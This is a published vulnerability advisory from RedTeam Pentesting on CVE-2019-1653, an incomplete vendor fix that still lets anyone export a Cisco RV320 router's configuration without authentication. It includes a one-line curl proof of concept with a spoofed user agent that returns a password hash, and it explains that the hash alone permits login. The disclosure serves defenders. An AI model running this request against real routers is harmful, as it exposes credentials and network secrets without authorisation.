Advisory: Cisco RV320 Unauthenticated Configuration Export
RedTeam Pentesting discovered that the configuration of a Cisco RV320router can still be exported without authentication via the device's webinterface due to an inadequate fix by the vendor.Details=======Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly othersAffected Versions: 1.4.2.15 through 1.4.2.20Fixed Versions: noneVulnerability Type: Information DisclosureSecurity Risk: highVendor URL: Vendor Status: working on patchAdvisory URL: Advisory Status: publishedCVE: CVE-2019-1653CVE URL: Introduction============"Keep your employees, your business, and yourself productive andeffective. The Cisco RV320 Dual Gigabit WAN VPN Router is an idealchoice for any small office or small business looking for performance,security, and reliability in its network."(from the Cisco RV320 product page [1])More Details============The Cisco RV320 Dual Gigabit WAN VPN Router provides a web-basedconfiguration interface, which is implemented in various CGI programs inthe device's firmware. Access to this web interface requires priorauthentication using a username and password. Previously, RedTeamPentesting identified a vulnerability (rt-sa-2018-002) [2] in the CGIprogram:/cgi-bin/config.expBy issuing an HTTP GET request to this program, it was possible toexport a router's configuration without providing any priorauthentication. This vulnerability was adressed in firmware version1.4.2.19 published by Cisco [3].RedTeam Pentesting discovered that the CGI program in the patchedfirmware is still vulnerable. By performing a specially crafted HTTPPOST request, attackers are still able to download the router'sconfiguration. The user agent "curl" is blacklisted by the firmware andmust be adjusted in the HTTP client. Again, exploitation does notrequire any authentication.Proof of Concept================A device's configuration can be retrieved by issuing an HTTP POST requestto the vulnerable CGI program (output shortened):------------------------------------------------------------------------$ curl -s -k -A kurl -X POST --data 'submitbkconfig=0' \ ''####sysconfig####[VERSION]VERSION=73MODEL=RV320SSL=0IPSEC=0PPTP=0PLATFORMCODE=RV0XX[...][SYSTEM]HOSTNAME=routerDOMAINNAME=example.comDOMAINCHANGE=1USERNAME=ciscoPASSWD=066bae9070a9a95b3e03019db131cd40[...]------------------------------------------------------------------------Workaround==========Prevent untrusted clients from connecting to the device's web server.Fix===NoneSecurity Risk=============This vulnerability is rated as a high risk as it exposes the device'sconfiguration to untrusted, potentially malicious parties. Bydownloading the configuration, attackers can obtain internal networkconfiguration, VPN or IPsec secrets, as well as password hashes for therouter's user accounts. Knowledge of a user's password hash issufficient to log into the router's web interface, cracking of the hashis not required. Any information obtained through exploitation of thisvulnerability can be used to facilitate further compromise of the deviceitself or attached networks.Timeline========2018-09-19 Original vulnerability identified2018-09-27 Customer approved disclosure to vendor2018-09-28 Vendor notified2018-10-05 Receipt of advisory acknowledged by vendor2018-10-05 Notified vendor of disclosure date: 2019-01-092018-11-18 List of affected versions provided by vendor2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor2019-01-22 Firmware 1.4.2.20 released by vendor2019-01-23 Advisory (rt-sa-2018-002) published2019-02-07 Incomplete mitigation of vulnerability identified2019-02-08 Proof of concept sent to vendor2019-02-08 Receipt of proof of concept acknowledged by vendor2019-02-15 Full advisory sent to vendor2019-02-15 Notified vendor of disclosure date: 2019-03-272019-03-25 Requested progress update from vendor2019-03-25 Vendor requests postponed disclosure2019-03-25 Postponement declined2019-03-27 Advisory publishedReferences==========[1] [2] [3] RedTeam Pentesting GmbH=======================RedTeam Pentesting offers individual penetration tests performed by ateam of specialised IT-security experts. Hereby, security weaknesses incompany networks or products are uncovered and can be fixed immediately.As there are only few experts in this field, RedTeam Pentesting wants toshare its knowledge and enhance the public knowledge with research insecurity-related areas. The results are made available as publicsecurity advisories.More information about RedTeam Pentesting can be found at: